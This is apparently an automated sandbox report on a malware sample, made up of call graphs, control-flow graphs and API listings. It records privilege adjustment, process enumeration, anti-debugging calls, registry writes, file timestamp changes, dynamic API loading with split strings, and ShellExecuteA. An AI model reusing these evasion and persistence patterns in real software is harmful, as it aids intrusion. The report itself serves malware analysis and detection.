RtlLeaveCriticalSection 20336->20337 20338 1001417a 20337->20338 20338->20265 20340 10014074 __lseeki64_nolock 37 API calls 20339->20340 20341 10011bd4 20340->20341 20342 10011bed SetFilePointer 20341->20342 20343 10011bdc 20341->20343 20345 10011c05 GetLastError 20342->20345 20346 10011be1 20342->20346 20344 1000d5b3 __lseeki64_nolock 37 API calls 20343->20344 20344->20346 20345->20346 20347 10011c0f 20345->20347 20346->20284 20348 1000d5d9 __dosmaperr 37 API calls 20347->20348 20348->20346 20350 1000e58b __isleadbyte_l 39 API calls 20349->20350 20351 1000e5d2 20350->20351 20351->20327 20353 1000d5c6 __close 37 API calls 20352->20353 20354 1000d5e4 _free 20353->20354 20355 1000d5b3 __lseeki64_nolock 37 API calls 20354->20355 20356 1000d5f7 20355->20356 20356->20306 20357->20335 20359 1000eb55 20358->20359 20360 1000eb68 RtlLeaveCriticalSection 20358->20360 20363 1000eeb9 RtlLeaveCriticalSection 20359->20363 20360->20210 20362 1000eb65 20362->20210 20363->20362 20365 1000e1c9 __getptd 37 API calls 20364->20365 20366 1000b9d0 20365->20366 20367 1000a501 __call_reportfault 5 API calls 20366->20367 20368 1000ba68 20367->20368 20368->19932 20370 10009e75 20369->20370 20371 10009e7f 20369->20371 20373 1000a1a4 std::_Xinvalid_argument 38 API calls 20370->20373 20372 10009eb0 20371->20372 20375 10009f95 20371->20375 20372->19941 20373->20371 20376 10009fa1 __EH_prolog3_catch 20375->20376 20377 10009fb8 20376->20377 20378 1000a1a4 std::_Xinvalid_argument 38 API calls 20376->20378 20380 10009fd2 ctype 20377->20380 20381 1000a0b3 20377->20381 20378->20377 20380->20372 20382 1000a0fa 20381->20382 20383 1000a0bf 20381->20383 20382->20380 20384 1000b4c8 44 API calls 20383->20384 20386 1000a0d0 20383->20386 20384->20386 20385 1000a82f std::exception::exception 37 API calls 20387 1000a0e5 20385->20387 20386->20382 20386->20385 20388 1000bce7 __CxxThrowException@8 RaiseException 20387->20388 20388->20382 20390 10008ab3 20389->20390 20391 10008aba 20389->20391 20393 10008215 37 API calls 20390->20393 20392 10008ac8 20391->20392 20394 10008ade 20391->20394 20396 10007c48 2 API calls 20391->20396 20395 1000a501 __call_reportfault 5 API calls 20392->20395 20393->20391 20397 10008af9 20394->20397 20399 10007c7d 2 API calls 20394->20399 20398 10008dc1 20395->20398 20396->20394 20400 1000839b 50 API calls 20397->20400 20398->19946 20399->20394 20401 10008b0d 20400->20401 20402 10008b1c 20401->20402 20404 10008b49 20401->20404 20403 10008930 43 API calls 20402->20403 20403->20392 20405 1000b61b __fassign 39 API calls 20404->20405 20407 10008b7a 20405->20407 20406 10008c55 20408 1000a510 _sprintf 62 API calls 20406->20408 20407->20406 20410 10008b85 _memset 20407->20410 20409 10008c6e 20408->20409 20411 10008930 43 API calls 20409->20411 20413 1000b0dd _strcat_s 37 API calls 20410->20413 20425 10008c7d CreateFileA 20411->20425 20417 10008bed 20413->20417 20414 10008ce2 20460 10007e91 20414->20460 20416 10008cef 20418 10008d02 20416->20418 20419 1000b4c8 44 API calls 20416->20419 20431 1000a510 20417->20431 20424 10008d67 20418->20424 20426 10008d3b WriteFile 20418->20426 20475 10007fea 20418->20475 20419->20418 20427 10008215 37 API calls 20424->20427 20425->20392 20425->20414 20426->20418 20426->20424 20428 10008d78 20427->20428 20429 10008d81 SetFileTime 20428->20429 20430 10008da2 CloseHandle 20428->20430 20429->20430 20430->20392 20432 1000a543 20431->20432 20433 1000a52e 20431->20433 20432->20433 20434 1000a54a 20432->20434 20435 1000d5b3 __lseeki64_nolock 37 API calls 20433->20435 20436 1000c82b __output_l 62 API calls 20434->20436 20437 1000a533 20435->20437 20440 1000a570 20436->20440 20438 1000d561 __output_l 11 API calls 20437->20438 20439 10008c96 20438->20439 20442 10008930 20439->20442 20440->20439 20481 1000c620 20440->20481 20443 1000894f 20442->20443 20450 100089af 20442->20450 20444 1000b61b __fassign 39 API calls 20443->20444 20448 10008961 GetFileAttributesA 20444->20448 20445 10008a70 20446 1000a501 __call_reportfault 5 API calls 20445->20446 20447 10008a7c 20446->20447 20447->20425 20448->20450 20452 100089a0 CreateDirectoryA 20448->20452 20450->20445 20451 100089f8 20450->20451 20455 10008930 39 API calls 20450->20455 20453 10008a19 20451->20453 20454 1000b61b __fassign 39 API calls 20451->20454 20452->20450 20457 1000b61b __fassign 39 API calls 20453->20457 20454->20453 20455->20451 20458 10008a48 GetFileAttributesA 20457->20458 20458->20445 20459 10008a61 CreateDirectoryA 20458->20459 20459->20445 20461 10007ea9 20460->20461 20474 10007ea1 20460->20474 20462 10007eb8 20461->20462 20463 10008215 37 API calls 20461->20463 20461->20474 20464 10007cce 2 API calls 20462->20464 20463->20462 20465 10007ecc 20464->20465 20466 1000ac8b _malloc 37 API calls 20465->20466 20465->20474 20467 10007ee2 20466->20467 20468 1000ac8b _malloc 37 API calls 20467->20468 20467->20474 20469 10007ef3 20468->20469 20470 10007f18 20469->20470 20471 10007f09 20469->20471 20470->20474 20533 10007127 20470->20533 20472 1000ac51 _free 37 API calls 20471->20472 20472->20474 20474->20416 20479 10008002 20475->20479 20476 100075d8 SetFilePointer 20476->20479 20478 10008009 20478->20418 20479->20476 20479->20478 20480 10007637 ReadFile 20479->20480 20545 100071c0 20479->20545 20480->20479 20482 10012595 __output_l 37 API calls 20481->20482 20483 1000c630 20482->20483 20484 1000c652 20483->20484 20485 1000c63b 20483->20485 20487 1000c656 20484->20487 20495 1000c663 __flsbuf 20484->20495 20486 1000d5b3 __lseeki64_nolock 37 API calls 20485->20486 20497 1000c640 20486->20497 20488 1000d5b3 __lseeki64_nolock 37 API calls 20487->20488 20488->20497 20489 1000c6c4 20490 1000c753 20489->20490 20491 1000c6d3 20489->20491 20492 10012422 __write 60 API calls 20490->20492 20493 1000c6ea 20491->20493 20498 1000c707 20491->20498 20492->20497 20494 10012422 __write 60 API calls 20493->20494 20494->20497 20495->20489 20496 1001253f __flsbuf 37 API calls 20495->20496 20495->20497 20499 1000c6b9 20495->20499 20496->20499 20497->20439 20498->20497 20505 10011c3b 20498->20505 20499->20489 20502 100124f6 20499->20502 20503 1000f7c3 __malloc_crt 37 API calls 20502->20503 20504 1001250b 20503->20504 20504->20489 20506 10011c47 ___BuildCatchObjectHelper 20505->20506 20507 10011c74 20506->20507 20508 10011c58 20506->20508 20510 10011c80 20507->20510 20514 10011cba 20507->20514 20509 1000d5c6 __close 37 API calls 20508->20509 20512 10011c5d 20509->20512 20511 1000d5c6 __close 37 API calls 20510->20511 20513 10011c85 20511->20513 20515 1000d5b3 __lseeki64_nolock 37 API calls 20512->20515 20516 1000d5b3 __lseeki64_nolock 37 API calls 20513->20516 20517 100140dd ___lock_fhandle 39 API calls 20514->20517 20523 10011c65 ___BuildCatchObjectHelper 20515->20523 20518 10011c8d 20516->20518 20519 10011cc0 20517->20519 20520 1000d561 __output_l 11 API calls 20518->20520 20521 10011cea 20519->20521 20522 10011cce 20519->20522 20520->20523 20525 1000d5b3 __lseeki64_nolock 37 API calls 20521->20525 20524 10011bb6 __lseeki64_nolock 39 API calls 20522->20524 20523->20497 20527 10011cdf 20524->20527 20526 10011cef 20525->20526 20528 1000d5c6 __close 37 API calls 20526->20528 20530 10011d1b 20527->20530 20528->20527 20531 1001417c __unlock_fhandle RtlLeaveCriticalSection 20530->20531 20532 10011d23 20531->20532 20532->20523 20534 1000712e 20533->20534 20535 10007133 20533->20535 20534->20474 20537 1000719f 20535->20537 20538 10005c1f 20535->20538 20537->20474 20539 10005c30 20538->20539 20540 10005c39 20539->20540 20542 10007072 20539->20542 20540->20537 20543 1000b635 _calloc 37 API calls 20542->20543 20544 10007080 20543->20544 20544->20540 20546 100071d3 20545->20546 20547 100073f7 20545->20547 20546->20547 20549 10005ca2 20546->20549 20547->20479 20551 10005cd4 20549->20551 20550 10005ce8 20550->20546 20551->20550 20554 10007072 37 API calls 20551->20554 20555 10006974 20551->20555 20559 100069f0 20551->20559 20554->20551 20556 10006989 20555->20556 20557 10006993 20556->20557 20558 100064a2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20556->20558 20557->20551 20558->20557 20560 10006a0a 20559->20560 20561 100064a2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20560->20561 20564 10006a14 20560->20564 20562 10006a41 20561->20562 20563 100064a2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20562->20563 20562->20564 20563->20564 20564->20551 20566 100095f2 20565->20566 20567 100095f9 20565->20567 20571 10009645 20566->20571 20569 1000960c UnmapViewOfFile 20567->20569 20570 10009613 20567->20570 20569->20570 20570->19963 20575 10009664 ctype 20571->20575 20576 100096af 20571->20576 20572 100096cd 20572->20567 20575->20576 20577 10008f6b 20575->20577 20576->20572 20676 10009309 20576->20676 20721 10009515 20577->20721 20579 10008f83 20580 10009515 45 API calls 20579->20580 20581 10008f93 20580->20581 20582 10009515 45 API calls 20581->20582 20583 10008fa2 20582->20583 20584 10009515 45 API calls 20583->20584 20585 10008fb2 20584->20585 20586 10009515 45 API calls 20585->20586 20587 10008fc3 20586->20587 20588 10009515 45 API calls 20587->20588 20589 10008fd5 20588->20589 20590 10009515 45 API calls 20589->20590 20591 10008fe7 20590->20591 20592 10009515 45 API calls 20591->20592 20593 10008ff9 20592->20593 20594 10009515 45 API calls 20593->20594 20595 1000900b 20594->20595 20596 10009515 45 API calls 20595->20596 20597 1000901d 20596->20597 20598 10009515 45 API calls 20597->20598 20599 1000902f 20598->20599 20600 10009515 45 API calls 20599->20600 20601 10009041 20600->20601 20602 10009515 45 API calls 20601->20602 20603 10009053 20602->20603 20604 10009515 45 API calls 20603->20604 20605 10009065 20604->20605 20606 10009515 45 API calls 20605->20606 20607 10009077 20606->20607 20608 10009515 45 API calls 20607->20608 20609 10009089 20608->20609 20610 10009515 45 API calls 20609->20610 20611 1000909b 20610->20611 20612 10009515 45 API calls 20611->20612 20613 100090ad 20612->20613 20614 10009515 45 API calls 20613->20614 20615 100090bf 20614->20615 20616 10009515 45 API calls 20615->20616 20617 100090d1 20616->20617 20618 10009515 45 API calls 20617->20618 20619 100090e3 20618->20619 20620 10009515 45 API calls 20619->20620 20621 100090f5 20620->20621 20622 10009515 45 API calls 20621->20622 20623 10009107 20622->20623 20624 10009515 45 API calls 20623->20624 20625 10009119 20624->20625 20626 10009515 45 API calls 20625->20626 20627 1000912b 20626->20627 20628 10009515 45 API calls 20627->20628 20629 1000913d 20628->20629 20630 10009515 45 API calls 20629->20630 20631 1000914f 20630->20631 20632 10009515 45 API calls 20631->20632 20633 10009161 20632->20633 20634 10009515 45 API calls 20633->20634 20635 10009173 20634->20635 20636 10009515 45 API calls 20635->20636 20637 10009188 20636->20637 20638 10009515 45 API calls 20637->20638 20639 1000919a 20638->20639 20640 10009515 45 API calls 20639->20640 20641 100091af 20640->20641 20642 10009515 45 API calls 20641->20642 20643 100091c1 20642->20643 20644 10009515 45 API calls 20643->20644 20645 100091d6 20644->20645 20646 10009515 45 API calls 20645->20646 20647 100091e8 20646->20647 20648 10009515 45 API calls 20647->20648 20649 100091fa 20648->20649 20650 10009515 45 API calls 20649->20650 20651 1000920c 20650->20651 20652 10009515 45 API calls 20651->20652 20653 1000921e 20652->20653 20654 10009515 45 API calls 20653->20654 20655 10009230 20654->20655 20656 10009515 45 API calls 20655->20656 20657 10009242 20656->20657 20658 10009515 45 API calls 20657->20658 20659 10009254 20658->20659 20660 10009515 45 API calls 20659->20660 20661 10009266 20660->20661 20662 10009515 45 API calls 20661->20662 20663 10009278 20662->20663 20664 10009515 45 API calls 20663->20664 20665 1000928a 20664->20665 20666 10009515 45 API calls 20665->20666 20667 1000929c 20666->20667 20668 10009515 45 API calls 20667->20668 20669 100092ae 20668->20669 20670 100092c5 20669->20670 20671 10009515 45 API calls 20669->20671 20672 100092fb 20670->20672 20673 100092e0 20670->20673 20674 10009515 45 API calls 20670->20674 20671->20670 20672->20575 20673->20672 20675 10009515 45 API calls 20673->20675 20674->20673 20675->20672 20677 10009515 45 API calls 20676->20677 20678 10009325 20677->20678 20679 10009515 45 API calls 20678->20679 20680 10009335 20679->20680 20681 10009515 45 API calls 20680->20681 20682 10009345 20681->20682 20683 10009515 45 API calls 20682->20683 20684 10009355 20683->20684 20685 10009515 45 API calls 20684->20685 20686 10009365 20685->20686 20687 10009515 45 API calls 20686->20687 20688 10009375 20687->20688 20689 10009515 45 API calls 20688->20689 20690 10009385 20689->20690 20691 10009515 45 API calls 20690->20691 20692 10009395 20691->20692 20693 10009515 45 API calls 20692->20693 20694 100093a7 20693->20694 20695 10009515 45 API calls 20694->20695 20696 100093bf 20695->20696 20697 10009515 45 API calls 20696->20697 20698 100093d1 20697->20698 20699 10009515 45 API calls 20698->20699 20700 100093e3 20699->20700 20701 10009515 45 API calls 20700->20701 20702 100093f5 20701->20702 20703 10009515 45 API calls 20702->20703 20704 1000940a 20703->20704 20705 10009515 45 API calls 20704->20705 20706 1000941f 20705->20706 20707 10009515 45 API calls 20706->20707 20708 10009434 20707->20708 20709 10009515 45 API calls 20708->20709 20710 10009443 20709->20710 20711 10009515 45 API calls 20710->20711 20712 10009457 20711->20712 20713 10009515 45 API calls 20712->20713 20714 1000946b 20713->20714 20715 10009515 45 API calls 20714->20715 20716 1000947d 20715->20716 20717 10009515 45 API calls 20716->20717 20718 1000948d 20717->20718 20719 10009515 45 API calls 20718->20719 20720 1000949d 20719->20720 20720->20572 20723 10009529 ctype 20721->20723 20726 1000954f 20721->20726 20722 100095be WriteFile 20725 1000958f 20722->20725 20724 1000b4c8 44 API calls 20723->20724 20723->20726 20724->20726 20725->20579 20726->20722 20726->20725 20728 10002d5e 20727->20728 20731 10002c5c _memset 20727->20731 20729 1000a501 __call_reportfault 5 API calls 20728->20729 20730 10002d69 20729->20730 20730->19527 20731->20731 20732 10002c87 Sleep 20731->20732 20733 10002c9d 20732->20733 20734 10002cc4 20733->20734 20735 10002d1e WriteFile 20733->20735 20737 1000ac8b _malloc 37 API calls 20734->20737 20736 10002d44 FlushFileBuffers 20735->20736 20738 10002d50 CloseHandle 20736->20738 20739 10002ccf _memset 20737->20739 20738->20728 20739->20738 20740 10002cfc WriteFile 20739->20740 20741 1000ac51 _free 37 API calls 20740->20741 20742 10002d1b 20741->20742 20742->20736 20744 1000a62e 20743->20744 20745 1000a649 20744->20745 20746 1000a65e 20744->20746 20758 1000a633 _strlen 20744->20758 20748 1000d5b3 __lseeki64_nolock 37 API calls 20745->20748 20747 1000a594 _LocaleUpdate::_LocaleUpdate 39 API calls 20746->20747 20749 1000a669 20747->20749 20750 1000a64e 20748->20750 20751 1000a674 20749->20751 20752 1000a72b 20749->20752 20753 1000d561 __output_l 11 API calls 20750->20753 20757 1000a6bf GetLastError 20751->20757 20751->20758 20754 1000a739 MultiByteToWideChar 20752->20754 20752->20758 20753->20758 20755 1000a74d 20754->20755 20754->20758 20756 1000d5b3 __lseeki64_nolock 37 API calls 20755->20756 20756->20758 20759 1000a6fd 20757->20759 20762 1000a6ca 20757->20762 20758->19531 20759->20758 20760 1000d5b3 __lseeki64_nolock 37 API calls 20759->20760 20760->20758 20761 1000e58b __isleadbyte_l 39 API calls 20761->20762 20762->20759 20762->20761 20764 10001799 20763->20764 20765 1000179d LookupPrivilegeValueA 20763->20765 20769 1000a501 __call_reportfault 5 API calls 20764->20769 20766 100017b2 CloseHandle 20765->20766 20767 100017bd AdjustTokenPrivileges 20765->20767 20766->20764 20767->20766 20768 100017f0 20767->20768 20768->20764 20770 100017fc 20769->20770 20771 100017fe CreateToolhelp32Snapshot 20770->20771 20772 1000c4a0 _memset 20771->20772 20773 1000183b Process32FirstW 20772->20773 20774 1000187d 20773->20774 20775 10001881 CloseHandle 20774->20775 20776 10001858 lstrcmpiW 20774->20776 20779 1000a501 __call_reportfault 5 API calls 20775->20779 20776->20775 20777 1000186f Process32NextW 20776->20777 20777->20774 20780 1000189e 20779->20780 20780->19546 20780->19547 20782 1000a501 __call_reportfault 5 API calls 20781->20782 20783 100018e8 20782->20783 20783->19567 20784->19707 20786 100016d6 __EH_prolog3 20785->20786 20787 1000b4c8 44 API calls 20786->20787 20788 100016dd 20787->20788 20789 100016eb SysAllocString 20788->20789 20790 10001705 20788->20790 20789->20790 20790->19710 20792 10001731 InterlockedDecrement 20791->20792 20794 10001750 ctype 20791->20794 20793 1000173f 20792->20793 20792->20794 20793->20794 20795 10001749 SysFreeString 20793->20795 20794->19712 20795->20794 20797 1000167e __EH_prolog3 20796->20797 20798 1000b4c8 44 API calls 20797->20798 20799 10001685 20798->20799 20801 100016a6 20799->20801 20802 1000a270 20799->20802 20801->19714 20803 1000a2b6 lstrlen MultiByteToWideChar 20802->20803 20804 1000a2af 20802->20804 20805 1000a2dc GetLastError 20803->20805 20807 1000a2e6 20803->20807 20806 1000a501 __call_reportfault 5 API calls 20804->20806 20805->20807 20809 1000a3e5 20806->20809 20808 1000ac8b _malloc 37 API calls 20807->20808 20811 1000a308 20807->20811 20808->20811 20809->20801 20810 1000a360 MultiByteToWideChar 20812 1000a3a0 SysAllocString 20810->20812 20813 1000a375 20810->20813 20811->20810 20812->20804 20814 1000a3b1 20812->20814 20815 1000a386 GetLastError 20813->20815 20817 1000ac51 _free 37 API calls 20813->20817 20816 1000ac51 _free 37 API calls 20814->20816 20818 1000a390 20815->20818 20816->20804 20819 1000a383 20817->20819 20818->20812 20819->20815 20820->19748
                                          APIs
                                          • GetNativeSystemInfo.KERNEL32(?), ref: 042904A2
                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 042904D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocInfoNativeSystemVirtual
                                          • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                          • API String ID: 2032221330-2899676511
                                          • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                          • Instruction ID: 556affab8c574445bc3d2e8dacbf3a5c73ccda58463f3fb081316a2fdde6e388
                                          • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                          • Instruction Fuzzy Hash: D1627D7161938A8FEB34CF24C880BABB7E5BF84704F04492DE9D98B251E770E945CB56

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 793 1000839b-100083c7 794 1000891a 793->794 795 100083cd-100083d2 793->795 797 1000891f-1000892d call 1000a501 794->797 795->794 796 100083d8-100083dc 795->796 798 100083e6-100083f0 796->798 799 100083de-100083e3 call 10008215 796->799 802 100083f2-100083f5 798->802 803 10008406-10008409 798->803 799->798 806 100083f7-100083fd 802->806 807 1000840b-1000844e 802->807 803->807 808 10008450-10008455 803->808 809 100083ff-10008401 806->809 807->809 810 10008467-1000846c 808->810 811 10008457-10008464 call 10007c48 808->811 809->797 813 1000848b-100084c1 call 10007a25 call 10007cce 810->813 814 1000846e-10008489 call 10007c7d 810->814 811->810 821 100084c6-100084cb 813->821 814->813 822 100084d7-100084ea call 100075d8 821->822 823 100084cd-100084d2 821->823 826 100084f6-10008529 call 1000b4c8 call 10007637 822->826 827 100084ec-100084f1 822->827 823->797 832 10008539-10008540 826->832 833 1000852b-10008537 call 1000b09f 826->833 827->797 835 10008542-10008553 832->835 833->827 835->835 837 10008555 835->837 838 1000855b-1000855f 837->838 839 10008561-10008565 838->839 840 1000856c-1000856e 838->840 839->840 841 10008567-1000856a 839->841 842 10008570-10008572 840->842 843 10008574-10008575 840->843 841->838 842->843 844 10008577-10008586 call 1000b79f 842->844 843->838 847 10008588-10008597 call 1000b79f 844->847 848 100085bb-100085be 844->848 847->848 851 10008599-100085a8 call 1000b79f 847->851 848->838 851->848 854 100085aa-100085b9 call 1000b79f 851->854 854->848 857 100085c0-1000860a call 1000b61b 854->857 860 1000861b-10008647 857->860 861 1000860c-1000860f 857->861 862 1000864d-10008656 860->862 861->860 863 10008611-10008614 861->863 864 10008662-10008669 862->864 865 10008658 862->865 863->860 866 10008616-10008619 863->866 867 10008672-10008679 864->867 868 1000866b 864->868 865->864 866->860 866->862 869 10008682-10008684 867->869 870 1000867b 867->870 868->867 871 10008686 869->871 872 1000868d-10008694 869->872 870->869 871->872 873 10008696 872->873 874 1000869d-1000879a SystemTimeToFileTime LocalFileTimeToFileTime 872->874 873->874 875 100087a0 874->875 876 100088e1 874->876 877 100087a6-100087d1 875->877 878 100088e7-100088e9 876->878 879 100087d3-100087e5 877->879 880 100087ec-10008812 877->880 881 100088f2-1000890f 878->881 882 100088eb-100088f1 call 1000b09f 878->882 879->877 886 100087e7 879->886 884 10008814-10008855 call 10005551 880->884 885 10008857 880->885 881->794 882->881 889 1000885d-10008864 884->889 885->889 886->878 891 100088a1-100088a8 889->891 892 10008866-1000889b call 10005551 889->892 891->878 894 100088aa-100088db call 10005551 891->894 892->891 894->876
                                          APIs
                                            • Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                          • __fassign.LIBCMT ref: 100085CA
                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000872F
                                          • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 1000875B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: FileTime$LocalPointerSystem__fassign
                                          • String ID:
                                          • API String ID: 3768451866-0
                                          • Opcode ID: a0e44370e820a411ac3c4e0395b38255e828509c73a91178447ff1e363976091
                                          • Instruction ID: 7caf3288ed05fb6a441e9699661c42ec8f0179eb69e3d41cd2bddb86a4807b91
                                          • Opcode Fuzzy Hash: a0e44370e820a411ac3c4e0395b38255e828509c73a91178447ff1e363976091
                                          • Instruction Fuzzy Hash: 85F1BF709046659BEB64CB28C8887D9BBF0FF09390F1445E9E899DB286D735AB81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
                                          • Instruction ID: 82261dd005aa2ff95a724a3fc746c58a7ee0d63950bd4ce8a00652ab59f08db2
                                          • Opcode Fuzzy Hash: f67011e4635fa95f2e3239d786ef2b4d711adfe7c7f6f2761a5dd8ab5be8fb57
                                          • Instruction Fuzzy Hash: E5522A71D0061ADFDF14CF98C9846AEBBF1FF08351F2481AAE855AB649D735AA50CF80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 1000324b-100033b9 call 10010270 call 1000c4a0 5 100033bb-100033ce 0->5 5->5 6 100033d0-100034df Sleep call 1000c4a0 5->6 9 100034e1-100034f4 6->9 9->9 10 100034f6-10003606 Sleep call 1000c4a0 9->10 13 10003608-1000361b 10->13 13->13 14 1000361d-10003661 call 1000b19b call 1000b06c call 1000c4a0 call 1000b07e 13->14 23 10003663-10003688 call 1000b07e 14->23 24 1000368a-10003725 call 1000c4a0 wsprintfA call 1000c4a0 14->24 23->24 32 10003727-10003738 24->32 32->32 33 1000373a-10003792 Sleep call 1000c4a0 wsprintfA 32->33 39 10003793-10003799 33->39 39->39 40 1000379b-10003816 call 1000c4a0 wsprintfA call 1000c4a0 39->40 45 10003818-10003829 40->45 45->45 46 1000382b-1000389f Sleep call 1000c4a0 wsprintfA call 1000c4a0 45->46 51 100038a1-100038b2 46->51 51->51 52 100038b4-10003923 Sleep call 1000c4a0 wsprintfA call 1000c4a0 51->52 57 10003925-10003936 52->57 57->57 58 10003938 57->58 59 1000393d-10003972 call 100028b9 Sleep 58->59 62 10003974-100039a5 call 100028b9 Sleep 59->62 65 100039a7-100039d8 call 100028b9 Sleep 62->65 68 100039da-10003a01 call 1000b19b call 1000b06c call 1000c4a0 65->68 75 10003a03-10003a1f call 1000b07e 68->75 78 10003a21-10003c6f call 1000c4a0 * 2 call 1000518c call 10005166 call 1000518c * 4 call 10009824 call 10002d6b Sleep * 2 call 1000c4a0 call 1000a77d call 1000c4a0 * 2 call 1000b0dd FindWindowExA 75->78 111 10003c75-10003c7d call 100018ea 78->111 112 10003ec8-10003eec call 1000c4a0 78->112 118 10003cab-10003cae 111->118 119 10003c7f-10003ca6 call 10002388 Sleep call 10002388 111->119 117 10003eee-10003ef3 112->117 117->117 123 10003ef5-10003efe 117->123 121 10003cb4-10003e02 call 10002e12 118->121 122 10003e5c-10003ec3 GlobalAddAtomA 118->122 132 10003e5b 119->132 141 10003e04-10003e1b Sleep call 10002e12 121->141 142 10003e1e-10003e4c call 10002887 call 10002f95 121->142 155 100043d6-100043ec Sleep * 2 call 1000b46f 122->155 125 10003eff-10003f05 123->125 125->125 128 10003f07-10003f1e 125->128 131 10003f1f-10003f25 128->131 131->131 134 10003f27-10003f34 131->134 132->122 137 10003f35-10003f3b 134->137 137->137 139 10003f3d-10003f69 call 1000c4a0 137->139 150 10003f6a-10003f70 139->150 141->142 142->122 158 10003e4e-10003e56 call 10001144 142->158 150->150 151 10003f72-10003f81 150->151 154 10003f82-10003f88 151->154 154->154 157 10003f8a-10003f97 154->157 165 100043f1-1000440e RegOpenKeyExA 155->165 159 10003f98-10003f9e 157->159 158->132 159->159 162 10003fa0-10003fcc call 1000c4a0 159->162 171 10003fcd-10003fd3 162->171 167 10004410-10004417 165->167 168 10004453 165->168 169 1000441a-1000441f 167->169 170 10004455-10004463 Sleep 168->170 169->169 172 10004421-1000444c RegSetValueExA RegCloseKey 169->172 173 10004469-10004477 call 10002388 170->173 174 100042fe-10004395 call 1000c4a0 LoadLibraryA call 1000c4a0 GetProcAddress 170->174 171->171 175 10003fd5-10003fe4 171->175 172->168 176 1000444e-10004451 172->176 173->174 174->155 187 10004397-100043d4 call 1000c4a0 ShellExecuteA 174->187 179 10003fe5-10003feb 175->179 176->170 179->179 182 10003fed-10003ffc 179->182 184 10003ffd-10004003 182->184 184->184 186 10004005-10004015 184->186 188 10004016-1000401c 186->188 187->155 188->188 190 1000401e-1000402e 188->190 192 1000402f-10004035 190->192 192->192 193 10004037-10004045 192->193 194 10004046-1000404c 193->194 194->194 195 1000404e-1000405e 194->195 196 1000405f-10004065 195->196 196->196 197 10004067-10004077 196->197 198 10004078-1000407e 197->198 198->198 199 10004080-1000408f 198->199 200 10004090-10004096 199->200 200->200 201 10004098-100040a6 200->201 202 100040a7-100040ad 201->202 202->202 203 100040af-100040bf 202->203 204 100040c0-100040c6 203->204 204->204 205 100040c8-100040d7 204->205 206 100040d8-100040de 205->206 206->206 207 100040e0-100040f0 206->207 208 100040f2-100040f7 207->208 208->208 209 100040f9-10004102 208->209 210 10004103-10004109 209->210 210->210 211 1000410b-10004122 210->211 212 10004123-10004129 211->212 212->212 213 1000412b-1000419b call 1000c4a0 call 1000a77d call 1000c4a0 212->213 220 1000419c-100041a5 213->220 220->220 221 100041a7-100041b6 220->221 222 100041b9-100041c2 221->222 222->222 223 100041c4-100041d5 222->223 224 100041d7-100041df 223->224 224->224 225 100041e1-100041ea 224->225 226 100041ed-100041f6 225->226 226->226 227 100041f8-10004282 call 1000c4a0 * 2 call 1000b0dd FindWindowExA 226->227 227->165 234 10004288-100042bc call 10001030 Sleep CoInitializeEx 227->234 237 100042fc 234->237 238 100042be-100042de CoCreateInstance 234->238 237->174 239 100042e0-100042e6 238->239 240 100042f6 CoUninitialize 238->240 239->240 241 100042e8-100042f2 239->241 240->237 241->240
                                          APIs
                                          • _memset.LIBCMT ref: 100033B1
                                          • Sleep.KERNEL32(00000001), ref: 100033D8
                                          • _memset.LIBCMT ref: 100034D7
                                          • Sleep.KERNEL32(00000001), ref: 100034F8
                                          • _memset.LIBCMT ref: 100035FE
                                          • __time64.LIBCMT ref: 1000361E
                                          • _memset.LIBCMT ref: 10003641
                                          • _rand.LIBCMT ref: 10003649
                                          • _rand.LIBCMT ref: 10003663
                                          • _memset.LIBCMT ref: 100036E1
                                          • wsprintfA.USER32 ref: 10003706
                                          • _memset.LIBCMT ref: 1000371D
                                          • Sleep.KERNEL32(00000001), ref: 1000374E
                                          • _memset.LIBCMT ref: 10003761
                                          • wsprintfA.USER32 ref: 1000377E
                                          • _memset.LIBCMT ref: 100037CD
                                          • wsprintfA.USER32 ref: 100037F3
                                          • _memset.LIBCMT ref: 1000380E
                                          • Sleep.KERNEL32(00000001), ref: 1000382D
                                          • _memset.LIBCMT ref: 1000385F
                                          • wsprintfA.USER32 ref: 10003880
                                          • _memset.LIBCMT ref: 10003897
                                          • Sleep.KERNEL32(00000001), ref: 100038B6
